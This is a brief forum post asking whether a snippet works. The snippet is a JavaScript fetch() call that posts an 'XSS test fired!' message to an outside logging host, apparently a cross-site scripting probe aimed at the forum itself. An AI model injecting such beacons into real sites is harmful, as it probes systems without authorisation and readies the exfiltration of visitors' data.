Skip to main content

dose this work?

fetch("https://logger.bugbot1011.org/log", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ message: "XSS test fired!" })
});

Be the first to reply!

Your reply